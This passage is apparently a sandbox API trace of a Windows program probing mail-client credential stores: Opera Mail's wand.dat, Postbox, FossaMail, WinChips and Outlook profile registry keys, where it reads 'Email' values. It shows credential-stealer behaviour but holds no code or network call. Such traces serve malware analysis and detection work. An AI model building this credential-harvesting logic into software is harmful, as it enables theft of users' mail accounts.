wvsprintfW (in: param_1=0x63b6b0, param_2="%s\\Softwarenetz\\Mailing\\Daten\\mailing.vdt", arglist=0x19fb40 | out: param_1="C:\\Softwarenetz\\Mailing\\Daten\\mailing.vdt") returned 41 [0064.537] GetProcessHeap () returned 0x620000 [0064.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x56) returned 0x63a6e0 [0064.537] GetProcessHeap () returned 0x620000 [0064.538] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0064.539] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.539] PathFileExistsW (pszPath="C:\\Softwarenetz\\Mailing\\Daten\\mailing.vdt") returned 0 [0064.539] GetProcessHeap () returned 0x620000 [0064.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a6e0 | out: hHeap=0x620000) returned 1 [0064.540] GetProcessHeap () returned 0x620000 [0064.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0064.540] GetProcessHeap () returned 0x620000 [0064.540] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f82) returned 0x63b6b0 [0064.541] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.542] wvsprintfW (in: param_1=0x63b6b0, param_2="%s\\Opera Mail\\Opera Mail\\wand.dat", arglist=0x19fb4c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Mail\\Opera Mail\\wand.dat") returned 68 [0064.542] GetProcessHeap () returned 0x620000 [0064.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c) returned 0x63a478 [0064.542] GetProcessHeap () returned 0x620000 [0064.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0064.543] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.543] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Mail\\Opera Mail\\wand.dat") returned 0 [0064.544] GetProcessHeap () returned 0x620000 [0064.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0064.544] GetProcessHeap () returned 0x620000 [0064.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63b6b0 [0064.545] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.545] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Postbox\\Postbox", pszValue="CurrentVersion", pdwType=0x0, pvData=0x63b6b0, pcbData=0x19fba4*=0x104 | out: pdwType=0x0, pvData=0x63b6b0, pcbData=0x19fba4*=0x104) returned 0x2 [0064.545] GetProcessHeap () returned 0x620000 [0064.546] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0064.546] GetProcessHeap () returned 0x620000 [0064.546] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63b6b0 [0064.547] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.547] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Mozilla\\FossaMail", pszValue="CurrentVersion", pdwType=0x0, pvData=0x63b6b0, pcbData=0x19fba4*=0x104 | out: pdwType=0x0, pvData=0x63b6b0, pcbData=0x19fba4*=0x104) returned 0x2 [0064.547] GetProcessHeap () returned 0x620000 [0064.548] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0064.548] GetProcessHeap () returned 0x620000 [0064.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a478 [0064.548] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0064.549] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x63a478 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0064.550] Sleep (dwMilliseconds=0xa) [0064.636] GetProcessHeap () returned 0x620000 [0064.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f4a) returned 0x63b6b0 [0064.637] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.638] wvsprintfW (in: param_1=0x63b6b0, param_2="%s\\%s", arglist=0x19f8f4 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\*Mailbox.ini") returned 44 [0064.638] GetProcessHeap () returned 0x620000 [0064.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5c) returned 0x63a6e0 [0064.651] GetProcessHeap () returned 0x620000 [0064.652] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0064.652] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*Mailbox.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\*mailbox.ini"), lpFindFileData=0x19f908 | out: lpFindFileData=0x19f908*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x207d0, ftCreationTime.dwHighDateTime=0x20000, ftLastAccessTime.dwLowDateTime=0x48, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x627960, ftLastWriteTime.dwHighDateTime=0x627960, nFileSizeHigh=0x6340e0, nFileSizeLow=0x634808, dwReserved0=0x0, dwReserved1=0x19f964, cFileName="ը睹", cAlternateFileName="뒭蕬͈읩愣"ﭬ\x19䂑@")) returned 0xffffffff [0064.669] GetProcessHeap () returned 0x620000 [0064.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a6e0 | out: hHeap=0x620000) returned 1 [0064.670] GetProcessHeap () returned 0x620000 [0064.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0064.676] GetProcessHeap () returned 0x620000 [0064.676] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e8) returned 0x63b6b0 [0064.676] GetProcessHeap () returned 0x620000 [0064.676] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x62b6c8 [0064.676] GetProcessHeap () returned 0x620000 [0064.676] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b540 [0064.677] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.677] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\WinChips\\UserAccounts", phkResult=0x63b540 | out: phkResult=0x63b540*=0x0) returned 0x2 [0064.677] GetProcessHeap () returned 0x620000 [0064.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b540 | out: hHeap=0x620000) returned 1 [0064.677] GetProcessHeap () returned 0x620000 [0064.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0064.681] GetProcessHeap () returned 0x620000 [0064.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x62b6c8 | out: hHeap=0x620000) returned 1 [0064.681] GetProcessHeap () returned 0x620000 [0064.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e8) returned 0x63b6b0 [0064.681] GetProcessHeap () returned 0x620000 [0064.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x62b518 [0064.681] GetProcessHeap () returned 0x620000 [0064.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b590 [0064.682] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.683] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", phkResult=0x63b590 | out: phkResult=0x63b590*=0x0) returned 0x2 [0064.683] GetProcessHeap () returned 0x620000 [0064.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b590 | out: hHeap=0x620000) returned 1 [0064.683] GetProcessHeap () returned 0x620000 [0064.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b4f0 [0064.730] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.730] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook", phkResult=0x63b4f0 | out: phkResult=0x63b4f0*=0x0) returned 0x2 [0064.731] GetProcessHeap () returned 0x620000 [0064.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4f0 | out: hHeap=0x620000) returned 1 [0064.731] GetProcessHeap () returned 0x620000 [0064.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b4d0 [0064.732] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.732] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook", phkResult=0x63b4d0 | out: phkResult=0x63b4d0*=0x218) returned 0x0 [0064.732] GetProcessHeap () returned 0x620000 [0064.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63baa0 [0064.733] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.733] SHEnumKeyExW (in: hkey=0x218, dwIndex=0x0, pszName=0x63baa0, pcchName=0x19fb7c | out: pszName="0a0d020000000000c000000000000046", pcchName=0x19fb7c) returned 0x0 [0064.733] GetProcessHeap () returned 0x620000 [0064.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b5a0 [0064.734] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.734] RegOpenKeyW (in: hKey=0x218, lpSubKey="0a0d020000000000c000000000000046", phkResult=0x63b5a0 | out: phkResult=0x63b5a0*=0x210) returned 0x0 [0064.734] GetProcessHeap () returned 0x620000 [0064.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63beb8 [0064.735] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.735] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x63beb8, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x63beb8, pcbData=0x19f6f0*=0x208) returned 0x2 [0064.735] GetProcessHeap () returned 0x620000 [0064.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63beb8 | out: hHeap=0x620000) returned 1 [0064.736] GetProcessHeap () returned 0x620000 [0064.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f4a) returned 0x63beb8 [0064.736] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.737] wvsprintfW (in: param_1=0x63beb8, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046") returned 88 [0064.737] GetProcessHeap () returned 0x620000 [0064.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb4) returned 0x63a478 [0064.737] GetProcessHeap () returned 0x620000 [0064.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63beb8 | out: hHeap=0x620000) returned 1 [0064.737] GetProcessHeap () returned 0x620000 [0064.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b550 [0064.738] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.738] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", phkResult=0x63b550 | out: phkResult=0x63b550*=0x204) returned 0x0 [0064.738] GetProcessHeap () returned 0x620000 [0064.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63beb8 [0064.739] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.739] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x63beb8, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0064.739] GetProcessHeap () returned 0x620000 [0064.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63beb8 | out: hHeap=0x620000) returned 1 [0064.740] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.741] RegCloseKey (hKey=0x204) returned 0x0 [0064.741] GetProcessHeap () returned 0x620000 [0064.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b550 | out: hHeap=0x620000) returned 1 [0064.741] GetProcessHeap () returned 0x620000 [0064.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0064.742] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.742] RegCloseKey (hKey=0x210) returned 0x0 [0064.742] GetProcessHeap () returned 0x620000 [0064.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b5a0 | out: hHeap=0x620000) returned 1 [0064.743] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.743] SHEnumKeyExW (in: hkey=0x218, dwIndex=0x1, pszName=0x63baa0, pcchName=0x19fb7c | out: pszName="13dbb0c8aa05101a9bb000aa002fc45a", pcchName=0x19fb7c) returned 0x0 [0064.743] GetProcessHeap () returned 0x620000 [0064.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b590 [0064.744] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.744] RegOpenKeyW (in: hKey=0x218, lpSubKey="13dbb0c8aa05101a9bb000aa002fc45a", phkResult=0x63b590 | out: phkResult=0x63b590*=0x210) returned 0x0 [0064.744] GetProcessHeap () returned 0x620000 [0064.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63beb8 [0064.745] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.745] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x63beb8, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x63beb8, pcbData=0x19f6f0*=0x208) returned 0x2 [0064.745] GetProcessHeap () returned 0x620000 [0064.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63beb8 | out: hHeap=0x620000) returned 1 [0064.745] GetProcessHeap () returned 0x620000 [0064.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f4a) returned 0x63beb8 [0064.746] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.794] wvsprintfW (in: param_1=0x63beb8, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a") returned 88 [0064.794] GetProcessHeap () returned 0x620000 [0064.794] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb4) returned 0x63a478 [0064.794] GetProcessHeap () returned 0x620000 [0064.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63beb8 | out: hHeap=0x620000) returned 1 [0064.795] GetProcessHeap () returned 0x620000 [0064.795] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b670 [0064.795] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.796] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", phkResult=0x63b670 | out: phkResult=0x63b670*=0x204) returned 0x0 [0064.796] GetProcessHeap () returned 0x620000 [0064.796] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63beb8 [0064.797] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.797] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x63beb8, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0064.797] GetProcessHeap () returned 0x620000 [0064.797] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63beb8 | out: hHeap=0x620000) returned 1 [0064.798] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.798] RegCloseKey (hKey=0x204) returned 0x0 [0064.798] GetProcessHeap () returned 0x620000 [0064.798] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b670 | out: hHeap=0x620000) returned 1 [0064.798] GetProcessHeap () returned 0x620000 [0064.799] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0064.799] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.800] RegCloseKey (hKey=0x210) returned 0x0 [0064.800] GetProcessHeap () returned 0x620000 [0064.800] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b590 | out: hHeap=0x620000) returned 1 [0064.800] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.800] SHEnumKeyExW (in: hkey=0x218, dwIndex=0x2, pszName=0x63baa0, pcchName=0x19fb7c | out: pszName="2db91c5fd8470d46b1a5bc5efab4cae7", pcchName=0x19fb7c) returned 0x0 [0064.800] GetProcessHeap () returned 0x620000 [0064.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b550 [0064.801] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.801] RegOpenKeyW (in: hKey=0x218, lpSubKey="2db91c5fd8470d46b1a5bc5efab4cae7", phkResult=0x63b550 | out: phkResult=0x63b550*=0x210) returned 0x0 [0064.801] GetProcessHeap () returned 0x620000 [0064.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63beb8 [0064.802] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.802] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x63beb8, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x63beb8, pcbData=0x19f6f0*=0x208) returned 0x2 [0064.802] GetProcessHeap () returned 0x620000 [0064.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63beb8 | out: hHeap=0x620000) returned 1 [0064.803] GetProcessHeap () returned 0x620000 [0064.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f4a) returned 0x63beb8 [0064.803] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.804] wvsprintfW (in: param_1=0x63beb8, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\2db91c5fd8470d46b1a5bc5efab4cae7") returned 88 [0064.804] GetProcessHeap () returned 0x620000 [0064.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb4) returned 0x63a478 [0064.804] GetProcessHeap () returned 0x620000 [0064.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63beb8 | out: hHeap=0x620000) returned 1 [0064.804] GetProcessHeap () returned 0x620000 [0064.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b600 [0064.805] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.805] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\2db91c5fd8470d46b1a5bc5efab4cae7", phkResult=0x63b600 | out: phkResult=0x63b600*=0x204) returned 0x0 [0064.805] GetProcessHeap () returned 0x620000 [0064.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63beb8 [0064.806] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.806] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x63beb8, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0064.806] GetProcessHeap () returned 0x620000 [0064.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63beb8 | out: hHeap=0x620000) returned 1 [0064.807] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.807] RegCloseKey (hKey=0x204) returned 0x0 [0064.807] GetProcessHeap () returned 0x620000 [0064.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b600 | out: hHeap=0x620000) returned 1 [0064.808] GetProcessHeap () returned 0x620000 [0064.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0064.808] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.812] RegCloseKey (hKey=0x210) returned 0x0 [0064.812] GetProcessHeap () returned 0x620000 [0064.812] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b550 | out: hHeap=0x620000) returned 1 [0064.813] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.813] SHEnumKeyExW (in: hkey=0x218, dwIndex=0x3, pszName=0x63baa0, pcchName=0x19fb7c | out: pszName="3517490d76624c419a828607e2a54604", pcchName=0x19fb7c) returned 0x0 [0064.813] GetProcessHeap () returned 0x620000 [0064.813] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b590 [0064.814] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.814] RegOpenKeyW (in: hKey=0x218, lpSubKey="3517490d76624c419a828607e2a54604", phkResult=0x63b590 | out: phkResult=0x63b590*=0x210) returned 0x0 [0064.814] GetProcessHeap () returned 0x620000 [0064.814] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63beb8 [0064.815] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.815] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x63beb8, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x63beb8, pcbData=0x19f6f0*=0x208) returned 0x2 [0064.815] GetProcessHeap () returned 0x620000 [0064.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63beb8 | out: hHeap=0x620000) returned 1 [0064.816] GetProcessHeap () returned 0x620000 [0064.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f4a) returned 0x63beb8 [0064.816] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.817] wvsprintfW (in: param_1=0x63beb8, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604") returned 88 [0064.817] GetProcessHeap () returned 0x620000 [0064.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb4) returned 0x63a478 [0064.817] GetProcessHeap () returned 0x620000 [0064.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63beb8 | out: hHeap=0x620000) returned 1 [0064.817] GetProcessHeap () returned 0x620000 [0064.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b610 [0064.818] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.818] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", phkResult=0x63b610 | out: phkResult=0x63b610*=0x204) returned 0x0 [0064.818] GetProcessHeap () returned 0x620000 [0064.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63beb8 [0064.819] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.819] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x63beb8, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0064.819] GetProcessHeap () returned 0x620000 [0064.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63beb8 | out: hHeap=0x620000) returned 1 [0064.820] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.820] RegCloseKey (hKey=0x204) returned 0x0 [0064.820] GetProcessHeap () returned 0x620000 [0064.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b610 | out: hHeap=0x620000) returned 1 [0064.820] GetProcessHeap () returned 0x620000 [0064.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0064.821] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.822] RegCloseKey (hKey=0x210) returned 0x0 [0064.822] GetProcessHeap () returned 0x620000 [0064.822] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b590 | out: hHeap=0x620000) returned 1 [0064.822] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.822] SHEnumKeyExW (in: hkey=0x218, dwIndex=0x4, pszName=0x63baa0, pcchName=0x19fb7c | out: pszName="6c29d51f56390b45a924b3b787013a66", pcchName=0x19fb7c) returned 0x0 [0064.822] GetProcessHeap () returned 0x620000 [0064.822] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b520 [0064.823] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.823] RegOpenKeyW (in: hKey=0x218, lpSubKey="6c29d51f56390b45a924b3b787013a66", phkResult=0x63b520 | out: phkResult=0x63b520*=0x210) returned 0x0 [0064.824] GetProcessHeap () returned 0x620000 [0064.824] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63beb8 [0064.824] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.831] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x63beb8, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x63beb8, pcbData=0x19f6f0*=0x208) returned 0x2 [0064.831] GetProcessHeap () returned 0x620000 [0064.832] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63beb8 | out: hHeap=0x620000) returned 1 [0064.832] GetProcessHeap () returned 0x620000 [0064.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f4a) returned 0x63beb8 [0064.833] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0064.833] wvsprintfW (in: param_1=0x63beb8, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\6c29d51f56390b45a924b3b787013a66") returned 88 [0064.833] GetProcessHeap () returned 0x620000 [0064.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb4) returned 0x63a478 [0064.833] GetProcessHeap () returned 0x620000 [0064.834] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63beb8 | out: hHeap=0x620000) returned 1 [0064.834] GetProcessHeap () returned 0x620000 [0064.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b570 [0064.834] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.835] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\6c29d51f56390b45a924b3b787013a66", phkResult=0x63b570 | out: phkResult=0x63b570*=0x204) returned 0x0 [0064.835] GetProcessHeap () returned 0x620000 [0064.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63beb8 [0064.836] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.836] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x63beb8, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0064.836] GetProcessHeap () returned 0x620000 [0064.836] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63beb8 | out: hHeap=0x620000) returned 1 [0064.837] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.837] RegCloseKey (hKey=0x204) returned 0x0 [0064.837] GetProcessHeap () returned 0x620000 [0064.837] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b570 | out: hHeap=0x620000) returned 1 [0064.837] GetProcessHeap () returned 0x620000 [0064.838] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0064.838] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0064.839] RegCloseKey (hKey=0x210) returned 0x0 [0064.839] GetProcessHeap () returned 0x620000 [0064.839] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b520 | out: hHeap=0x620000) returned 1 [0064.839] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0064.839] SHEnumKeyExW (in: hkey=0x218, dwIndex=0x5, 